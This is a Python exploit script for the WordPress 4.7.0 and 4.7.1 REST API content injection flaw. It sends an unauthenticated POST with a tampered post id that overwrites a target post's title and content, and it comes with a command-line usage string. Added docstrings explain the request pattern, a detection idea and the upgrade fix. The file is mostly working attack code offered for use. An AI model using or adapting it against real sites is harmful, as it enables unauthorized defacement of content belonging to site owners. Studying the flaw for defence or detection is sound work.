- """
- Wordpress Content Injection Exploit | 4.7.0 & 4.7.1
- Usage: wp-content-injection.py --url http://127.0.0.1/wordpress/index.php/wp-json/wp/v2/posts/6 --title "rekt" --content "rip"
- Options:
- -h, --help show this help message and exit
- -u URL, --url=URL Specify the URL
- -t TITLE, --title=TITLE Specify the Page Title
- -c CONTENT, --content=CONTENT Specify the Page Content
- """
- # Exploit Title: WP Content Injection Exploit
- # Date: 02-02-2017
- # Author: GasGeverij
- # Version: Wordpress 4.7.0 & 4.7.1
- # by: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
- import json
- import requests
- import optparse
- import sys
- from urlparse import urlparse
- import time
# Path this script was invoked with; main() embeds it in the usage string.
script = sys.argv[0]
def getPid(url):
    """Return the path segment that directly follows 'posts' in *url*.

    The URL is split on '/', and the element after the first 'posts'
    element is returned as a string. Raises ValueError when no segment
    equals 'posts' and IndexError when 'posts' is the last segment.
    """
    segments = url.split('/')
    # list.index() finds the first occurrence only.
    return segments[segments.index('posts') + 1]
def getDomain(url):
    """Return '<scheme>://<netloc>/' for *url*, dropping path, query and fragment."""
    # Positional format field instead of a named one; output is the same.
    return '{0.scheme}://{0.netloc}/'.format(urlparse(url))
def banner():
    """Return the ASCII-art banner text that main() prints."""
    # Raw string: every backslash in the art is a literal character, which is
    # also what the non-raw original produced (none of them forms an escape).
    art = r"""
********************************************************
* _ _______ ______ _____ _____ _____ _____ *
*| | | | ___ \ | ___ \ _ / ___|_ _| |_ _| *
*| | | | |_/ /_____| |_/ / | | \ `--. | |______| | *
*| |/\| | __/______| __/| | | |`--. \ | |______| | *
*\ /\ / | | | \ \_/ /\__/ / | | _| |_ *
* \/ \/\_| \_| \___/\____/ \_/ \___/ *
* *
********************************************************
Cringe.
"""
    return art
def main():
    """Send one JSON POST built from the command-line options and print the outcome.

    Options read: -u/--url, -t/--title, -c/--content (all strings; no
    defaults are set here, so an omitted option is None).

    Shape of the request, as it would appear to a defender:
      * POST to the URL given with --url carrying only Content-Type and
        Accept headers -- no cookie, nonce or Authorization header is set.
      * JSON body whose "id" is the post id taken from the URL path with
        the literal suffix "textappendshere" appended, so the id in the
        body is not purely numeric and differs from the id in the route.
        Logging or rejecting REST requests to .../posts/<n> whose id
        parameter is non-numeric covers this pattern. The file header
        scopes the issue to WordPress 4.7.0 and 4.7.1, so upgrading past
        those releases is the remediation.

    An HTTP 200 is reported as success; the script does not fetch the
    post afterwards to confirm that anything changed.
    """
    usage_text = "Usage: "+script+" -u <URL> --title \"<PAGE_TITLE>\" --content \"<PAGE_CONTENT>\""
    cli = optparse.OptionParser(usage_text)
    cli.add_option("-u", "--url", dest="URL", type="string", help="Specify the URL")
    cli.add_option("-t", "--title", dest="TITLE", type="string", help="Specify the Page Title")
    cli.add_option("-c", "--content", dest="CONTENT", type="string", help="Specify the Page Content")
    opts, _positional = cli.parse_args()

    target = opts.URL
    post_id = getPid(target)

    # The string concatenations are kept so that an omitted --title or
    # --content still raises TypeError before any request is sent.
    payload = {
        "id": "" + str(post_id) + "textappendshere",
        "title": "" + opts.TITLE + "",
        "content": "" + opts.CONTENT + "",
    }
    request_headers = {
        'Content-Type': "application/json; charset=xxxe",
        'Accept': "application/json",
    }
    body = json.dumps(payload)
    reply = requests.post(target, data=body, headers=request_headers)
    status_text = str(reply.status_code)

    print banner()
    print "Status Code: "+status_text
    # time.sleep() returns None, so this pauses two seconds and prints "None".
    print time.sleep(2)

    if status_text != "200":
        print "May not be vulnerable?"
        return

    # These lines are printed after the request has already been sent.
    print "Yeyeye!"
    print "[+] Exploiting .. "
    print "[+] check the post.."
    print "[+] "+getDomain(target)+"?p="+post_id
# Entry point: main() runs only when the file is executed as a script.
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: report the abort and exit with status 0.
        print "[-] Abort. User stopped the script."
        sys.exit(0)
    except:
        # NOTE(review): this bare except discards every other exception from
        # main() -- e.g. the AttributeError raised when --url is omitted, or
        # an error raised by requests.post -- so such a run ends with no
        # output and no indication of whether a request was sent.
        pass